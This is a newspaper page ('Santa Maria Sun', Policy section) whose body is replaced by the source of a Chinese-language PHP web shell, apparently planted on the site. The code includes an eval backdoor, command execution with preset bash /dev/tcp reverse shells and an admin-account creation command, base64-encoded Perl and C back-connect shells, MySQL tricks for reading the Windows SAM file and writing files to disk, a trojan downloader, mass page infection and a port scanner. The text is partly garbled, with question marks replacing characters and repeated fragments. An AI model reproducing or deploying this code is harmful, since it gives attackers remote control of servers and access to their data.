Santa Maria Sun - The Newspaper for Northern Santa Barbara County

Santa Maria Sun> Policy

Wednesday, May 31, 2023 Volume 23, Issue 79

'); if($_GET['db']){ css_js("3"); mysql_select_db($_GET['db'], $sqlcon); html_n('

$v) $_POST[$k] = stripslashes($v); foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v); } if(isset($_REQUEST[postpass])){ hmlogin(2); @eval($_REQUEST[postpass]); exit;} if($_COOKIE['postpass'] != md5(postpass)){ if($_POST['postpass']){ if($_POST['postpass'] == postpass){ setcookie('postpass',md5($_POST['postpass'])); hmlogin(); }else{ echo '???????'; } } islogin($shellname,$myurl); exit; } if(isset($_GET['down'])) do_down($_GET['down']); if(isset($_GET['pack'])){ $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out,$_SERVER['HTTP_HOST'].".tar.gz"); } if(isset($_GET['unzip'])){ css_main(); start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']); exit; } define('root_dir',str_replace('\\','/',dirname(myaddress)).'/'); define('run_win',substr(PHP_OS, 0, 3) == "WIN"); define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME'])); $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; $doing = isset($_POST['doing']) ? $_POST['doing'] : ""; $path = isset($_GET['path']) ? $_GET['path'] : root_dir; $name = isset($_POST['name']) ? $_POST['name'] : ""; $img = isset($_GET['img']) ? $_GET['img'] : ""; $p = isset($_GET['p']) ? $_GET['p'] : ""; $pp = urlencode(dirname($p)); if($img) css_img($img); if($eanver == "phpinfo") die(phpinfo()); if($eanver == 'logout'){ setcookie('postpass',null); die(''); } $class = array( "????" => array("upfiles" => "????","phpinfo" => "????","info_f" => "????","phpcode" => "??PHP??"), "????" => array("sqlshell" => "??SQL??","mysql_exec" => "MYSQL??","myexp" => "MYSQL??","servu" => "Serv-U??","cmd" => "????","linux" => "????","downloader" => "????","port" => "????"), "????" => array("guama" => "??????","tihuan" => "??????","scanfile" => "??????","scanphp" => "??????"), "????" => array("getcode" => "????") ); $msg = array("0" => "????","1" => "????","2" => "????","3" => "????","4" => "????","5" => "????","6" => "????","7" => "????"); css_main(); switch($eanver){ case "left": css_left(); html_n("

"); html_img("title");html_n(" ????

?????
?????
????($drive)

"); $i = 2; foreach($class as $name => $array){ html_n("

"); html_img("title");html_n(" $name

$value

"); $i++; } html_n("

"); html_img("title");html_n(" ????

????

"); html_n(""); break; case "main": css_js("1"); $dir = @dir($path); $REAL_DIR = File_Str(realpath($path)); if(!empty($_POST['actall'])){echo '

'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'

';} $NUM_D = $NUM_F = 0; if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; $ROOT_DIR = File_Mode(); html_n("

"); html_n("

'); html_n(''); html_n(''); while($dirs = @$dir->read()){ if($dirs == '.' or $dirs == '..') continue; $dirpath = str_path("$path/$dirs"); if(is_dir($dirpath)){ $perm = substr(base_convert(fileperms($dirpath),10,8),-4); $filetime = @date('Y-m-d H:i:s',@filemtime($dirpath)); $dirpath = urlencode($dirpath); html_n(''); $NUM_D++; } } @$dir->rewind(); while($files = @$dir->read()){ if($files == '.' or $files == '..') continue; $filepath = str_path("$path/$files"); if(!is_dir($filepath)){ $fsize = @filesize($filepath); $fsize = File_Size($fsize); $perm = substr(base_convert(fileperms($filepath),10,8),-4); $filetime = @date('Y-m-d H:i:s',@filemtime($filepath)); $Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath); $todir=$ROOT_DIR.'/zipfile'; $filepath = urlencode($filepath); $it=substr($filepath,-3); html_n(''); $NUM_F++; } } @$dir->close(); if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8); print<<

??({$NUM_D}) / ??({$NUM_F})

END; break; case "editr": print<< END; html_base(); print<< END; css_js("2"); if(!empty($_POST['uploadt'])){ echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]); die(''); } if(!empty($_GET['redir'])){ $name=$_GET['name']; $newdir = str_path($p.'/'.$name); @mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]); die(''); } if(!empty($_GET['refile'])){ $name=$_GET['name']; $jspath=urlencode($p.'/'.$name); $pp = urlencode($p); $p = str_path($p.'/'.$name); $FILE_CODE = ""; $charset= 'GB2312'; $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8); if(@file_exists($p)) echo '??????"??"??
'; }else{ $jspath=urlencode($p); $FILE_TIME = date('Y-m-d H:i:s',filemtime($p)); $FILE_CODE=@file_get_contents($p); if (substr(PHP_VERSION,0,1)>=5){ if(empty($_GET['charset'])){ if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';} }else{ if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);} } } $FILE_CODE = htmlspecialchars($FILE_CODE); } print<<????:

????: END; html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print<<

?????? ??????????(????)

END; break; case "rename": html_n("

"); break; case "info_f": $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "?????"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from").""; if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);} $phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; $info = array( array("?????",date("Y?m?d? h:i:s",time())), array("?????","".$_SERVER['SERVER_NAME'].""), array("???IP??",gethostbyname($_SERVER['SERVER_NAME'])), array("???????",PHP_OS), array("???????????",$_SERVER['HTTP_ACCEPT_LANGUAGE']), array("???????",$_SERVER['SERVER_SOFTWARE']), array("??IP",$_SERVER["REMOTE_ADDR"]), array("Web????",$_SERVER['SERVER_PORT']), array("PHP????",strtoupper(php_sapi_name())), array("PHP??",PHP_VERSION), array("???????",Info_Cfg("safemode")), array("??????",$adminmail), array("?????",myaddress), array("???? URL ???? allow_url_fopen",Info_Cfg("allow_url_fopen")), array("????curl_exec",Info_Fun("curl_exec")), array("????????? enable_dl",Info_Cfg("enable_dl")), array("?????? display_errors",Info_Cfg("display_errors")), array("???????? register_globals",Info_Cfg("register_globals")), array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), array("??????????? memory_limit",Info_Cfg("memory_limit")), array("POST????? post_max_size",Info_Cfg("post_max_size")), array("???????? upload_max_filesize",$upsize), array("???????? max_execution_time",Info_Cfg("max_execution_time")."?"), array("?????? disable_functions",$dis_func), array("phpinfo()",$phpinfo), array("????????diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), array("???? GD Library",Info_Fun("imageline")), array("IMAP??????",Info_Fun("imap_close")), array("MySQL???",Info_Fun("mysql_close")), array("SyBase???",Info_Fun("sybase_close")), array("Oracle???",Info_Fun("ora_close")), array("Oracle 8 ???",Info_Fun("OCILogOff")), array("PREL???? PCRE",Info_Fun("preg_match")), array("PDF????",Info_Fun("pdf_close")), array("Postgre SQL???",Info_Fun("pg_close")), array("SNMP??????",Info_Fun("snmpget")), array("??????(Zlib)",Info_Fun("gzclose")), array("XML??",Info_Fun("xml_set_object")), array("FTP",Info_Fun("ftp_login")), array("ODBC?????",Info_Fun("odbc_close")), array("Session??",Info_Fun("session_start")), array("Socket??",Info_Fun("fsockopen")), ); $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); echo '

'); html_a('?eanver=main&path='.uppath($path),'????'); html_n('	??	????	('.get_current_user().')??\|?	????	????
'); html_img("dir"); html_a('?eanver=main&path='.$dirpath,$dirs); html_n('	'); html_n("??"); html_n("?? "); html_a('?pack='.$dirpath,'??'); html_n('	'); html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm); html_n('	'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs")); html_n('	'.$filetime.'	'); html_n('
'); html_img(css_showimg($files)); html_a($Fileurls,$files,'target="_blank"'); html_n('	'); if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z')) html_a('?unzip='.$filepath,'??','title="??'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); else html_a('?eanver=editr&p='.$filepath,'??','title="??'.$files.'"'); html_n("??"); html_n("?? "); html_n("??"); html_a('?down='.$filepath,'??','??','title="??'.$files.'"'); html_n('	'); html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm); html_n('	'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files")); html_n('	'.$filetime.'	'); html_a('?down='.$filepath,$fsize,'title="??'.$files.'"'); html_n('
"); $newname = urldecode($pp).'/'.urlencode($_GET['newname']); @rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]); die(''); break; case "deltree": html_n("
"); do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); die(''); break; case "del": html_n("
"); @unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); die(''); break; case "copy": html_n("
"); $newpath = explode('/',$_GET['newcopy']); $pathr[0] = $newpath[0]; for($i=1;$i < count($newpath);$i++){ $pathr[] = urlencode($newpath[$i]); } $newcopy = implode('/',$pathr); @copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]); die(''); break; case "perm": html_n("
".$p.' ???: '); if(is_dir($p)){ html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']); }else{ html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']); } html_input("submit","save","??"); back(); if($_POST['class']){ switch($_POST['class']){ case "0777": $change = @chmod($p,0777); break; case "0755": $change = @chmod($p,0755); break; case "0555": $change = @chmod($p,0555); break; case "0666": $change = @chmod($p,0666); break; case "0644": $change = @chmod($p,0644); break; case "0444": $change = @chmod($p,0444); break; } $change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]); die(''); } html_n("

'; for($i = 0;$i < count($info);$i++){echo ''."\n";} try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber"); $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); }catch(Exception $e){} echo ''."\n"; echo ''."\n"; echo ''."\n"; echo '

'.$info[$i][0].'	'.$info[$i][1].'
Terminal Service???	'.$registry_proxystring.'
Telnet???	'.$Telnet.'
PcAnywhere???	'.$PcAnywhere.'

'; break; case "cmd": $res = '????'; $cmd = 'whoami'; if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));} print<< function sFull(i){ Str = new Array(11); Str[0] = "dir"; Str[1] = "net user mysql$ envl /add"; Str[2] = "net localgroup administrators mysql$ /add"; Str[3] = "netstat -ano"; Str[4] = "ipconfig"; Str[5] = "tasklist /svc"; Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; Str[8] = "bash -i >& /dev/tcp/{$_SERVER["REMOTE_ADDR"]}/2366 0>&1"; Str[9] = "netstat -tlnp"; document.getElementById('cmd').value = Str[i]; return true; } END; html_base(); print<< END; break; case "linux": $yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR'); $yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388'; $system=strtoupper(substr(PHP_OS, 0, 3)); print<<????:
????????"nc -vv -l 12388"
??????????IP,???!????????!??NC??! END; if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) { setcookie('yourip',$backip); setcookie('yourport',$backport); echo '

'; if($_POST['use'] == 'perl') { $back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '??/tmp/envl_bc??
' : '??/tmp/envl_bc??
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '??????'; } if($_POST['use'] == 'c') { $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '??/tmp/envl_bc.c??
' : '??/tmp/envl_bc.c??
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : '??????'; } if($_POST['use'] == 'php') { if(!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); }else{ @dl('sockets.so') or die("Can't load socket"); } } if($system=="WIN") { $env=array('path' => 'c:\\windows\\system32'); }else{ $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array( 0 => array("pipe","r"), 1 => array("pipe","w"), 2 => array("pipe","w"), ); $host = $_POST['yourip']; $port = $_POST['yourport']; $host=gethostbyname($host); $proto=getprotobyname("tcp"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){ die("Socket????"); } if(($ret=socket_connect($sock,$host,$port))<0){ die("????"); }else{ $message="----------------------PHP????--------------------\n"; socket_write($sock,$message,strlen($message)); $cwd=str_replace('\\','/',dirname(__FILE__)); while($cmd=socket_read($sock,65535,$proto)){ if(trim(strtolower($cmd))=="exit"){ socket_write($sock,"Bye\n"); exit; }else{ $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg=stream_get_contents($pipes[1]); socket_write($sock,$msg,strlen($msg)); fclose($pipes[1]); $msg=stream_get_contents($pipes[2]); socket_write($sock,$msg,strlen($msg)); $return_value = proc_close($process); } } } } } if($_POST['use'] == 'nc') { echo '

'; $mip=$_POST['yourip']; $bport=$_POST['yourport']; $fp=fsockopen($mip , $bport , $errno, $errstr); if (!$fp){ $result = "Error: could not open socket connection"; }else { fputs ($fp ,"\n*********************************************\n hacking url:http://www.google.com is ok! \n*********************************************\n\n"); while(!feof($fp)){ fputs ($fp," [r00t@yzddmr6:/root]# "); $result= fgets ($fp, 4096); $message=`$result`; fputs ($fp,"--> ".$message."\n"); } fclose ($fp); } echo '

'; } echo '
????????? (nc -vv -l '.$_POST['yourport'].') '; } break; case "sqlshell": $MSG_BOX = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; if(isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); else $MSG_BOX = '??MYSQL??'; } $downfile = 'c:/windows/repair/sam'; if(!empty($_POST['downfile'])) { $downfile = File_Str($_POST['downfile']); $binpath = bin2hex($downfile); $query = 'select load_file(0x'.$binpath.')'; if($result = @mysql_query($query,$conn)) { $k = 0; $downcode = ''; while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} $filedown = basename($downfile); if(!$filedown) $filedown = 'envl.tmp'; $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-'.$arrayend); header('Content-Disposition: attachment; filename='.$filedown); header('Content-Length: '.strlen($downcode)); echo $downcode; exit; } else $MSG_BOX = '??????'; } $o = isset($_GET['o']) ? $_GET['o'] : ''; print<< function nFull(i){ Str = new Array(11); Str[0] = "select version();"; Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'"; Str[2] = "select '' into outfile 'F:/web/bak.php';"; Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; nform.msql.value = Str[i]; return true; } END; html_base(); print<<

[MYSQL????] [MYSQL????] [MYSQL????]

?? ?? ?? ?? ??

END; if($o == 'u') { $uppath = 'C:/Documents and Settings/All Users/??????/??/??/exp.vbs'; if(!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; $query = 'Create TABLE a (cmd text NOT NULL);'; if(@mysql_query($query,$conn)) { if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; if(@mysql_query($query,$conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; $MSG_BOX = @mysql_query($query,$conn) ? '??????' : '??????'; } else $MSG_BOX = '???????'; @mysql_query('Drop TABLE IF EXISTS a;',$conn); } else $MSG_BOX = '???????'; } print<<
????

????

END; } elseif($o == 'd') { print<<

????

END; } else { if(!empty($_POST['msql'])) { $msql = $_POST['msql']; $msql = base64_decode($msql); if($result = @mysql_query($msql,$conn)) { $MSG_BOX = '??SQL????
'; $k = 0; while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} } else $MSG_BOX .= mysql_error(); } print<<{$msql}

END; } if($MSG_BOX != '') echo '

'.$MSG_BOX.'

'; else echo '

'; break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<<

???

END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '

'; $contents = @file_get_contents($_POST['durl']); if(!$contents) echo '??????????'; else echo File_Write($_POST['dpath'],$contents,'wb') ? '??????' : '??????'; echo '

'; } break; case "issql": session_start(); if($_POST['sqluser'] && $_POST['sqlpass']){ $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} else{$_SESSION['sql_host'] = 'localhost';} if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} else{$_SESSION['sql_port'] = '3306';} if($_SESSION['sql_user'] && $_SESSION['sql_password']){ if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell','???????')); } } else{ die(html_a('?eanver=sqlshell','???????')); } $query = mysql_query("SHOW DATABASES",$sqlcon); html_n('

?????:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo ' '; } html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { echo "??SQL????"; }else{ echo "??: ".mysql_error(); } } if($_GET['table']){ html_n(''); $query = "SHOW COLUMNS FROM ".$_GET['table']; $result = mysql_query($query,$sqlcon); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields,$row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); while($text = @mysql_fetch_assoc($result)){ foreach($fields as $row){ if($text[$row] == "") $text[$row] = 'NULL'; html_n(''); } echo ''; } } else{ $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ html_n(""); } } } break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); print<<

???

END; if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) { echo '

'; $contents = @file_get_contents($_POST['durl']); if(!$contents) echo '??????????'; else echo File_Write($_POST['dpath'],$contents,'wb') ? '??????' : '??????'; echo '

'.$row['Field'].'

'.$text[$row].'

".$row[0]."

?????:'); while($db = mysql_fetch_array($query)) { html_a('?eanver=issql&db='.$db['Database'],$db['Database']); echo ' '; } html_n('

'); if(!empty($_POST['sql'])){ if (@mysql_query($_POST['sql'],$sqlcon)) { echo "??SQL????"; }else{ echo "??: ".mysql_error(); } } if($_GET['table']){ html_n(''); $query = "SHOW COLUMNS FROM ".$_GET['table']; $result = mysql_query($query,$sqlcon); $fields = array(); while($row = mysql_fetch_assoc($result)){ array_push($fields,$row['Field']); html_n(''); } html_n(''); $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); while($text = @mysql_fetch_assoc($result)){ foreach($fields as $row){ if($text[$row] == "") $text[$row] = 'NULL'; html_n(''); } echo ''; } } else{ $query = "SHOW TABLES FROM " . $_GET['db']; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)){ html_n(""); } } } break; case "upfiles": html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n(''); if(!empty($_POST['path'])){ html_n('

'.$row['Field'].'

'.$text[$row].'

".$row[0]."

?????????????: '.@get_cfg_var('upload_max_filesize').'

'); html_input("text","uppath",root_dir,"
?????: ","51"); print<< function addTank(){ var k=0; k=k+1; k=tank.rows.length; newRow=document.all.tank.insertRow(-1) newcell=newRow.insertCell() newcell.innerHTML=" " } function delTank() { if(tank.rows.length==1) return; var checkit = false; for (var i=0;i

?????????:

END; html_n('
'); if($_POST['upfiles']){ foreach ($_FILES["upfile"]["error"] as $key => $error){ if ($error == UPLOAD_ERR_OK){ $tmp_name = $_FILES["upfile"]["tmp_name"][$key]; $name = $_FILES["upfile"]["name"][$key]; $uploadfile = str_path($_POST['uppath'].'/'.$name); $upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3]; echo '

'.$upload; } } } html_n(''); break; case "guama": $patht = isset($_POST['path']) ? $_POST['path'] : root_dir; $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; $codet = isset($_POST['code']) ? $_POST['code'] : ""; html_n('

??????"|"??,?????????.

????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($patht,$codet,$_POST['return'],$bool,$typet); } break; case "tihuan": html_n('

????????????,?????.

????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']); } break; case "scanfile": css_js("4"); html_n('

?????????????MYSQL?????????,????.
?????????,???????,?????????.

????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool); } break; case "scanphp": html_n('

???????????,?????????????.

????:

'); if(isset($_POST['pass'])) $bool = true; else $bool = false; do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool); } break; case "port": $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|8080|43958|5631|2049|873|999'; print<<

??IP

???

END; if((!empty($_POST['ip'])) && (!empty($_POST['port']))) { echo '

'; $ports = explode('|', $_POST['port']); for($i = 0;$i < count($ports);$i++) { $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2); echo $fp ? '???? ---> '.$ports[$i].'
' : '???? ---> '.$ports[$i].'
'; ob_flush(); flush(); } echo '

'; } break; case "getcode": if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "

?? URL ????

";exit;} print<<

????

?????????? HTTP ??,?????????????????CSS???.
????????????????URL,???? SQL Injection ??????????.
??????? URL,?????????IP??? : {$_SERVER['SERVER_NAME']}

URL:

END; break; case "servu": $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; print<<[????] [????]

ServU??

END; if($_GET['o'] == 'adduser') { print<<?? ?? ?? END; } else { print<<????
END; } echo '

'; if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) { echo '

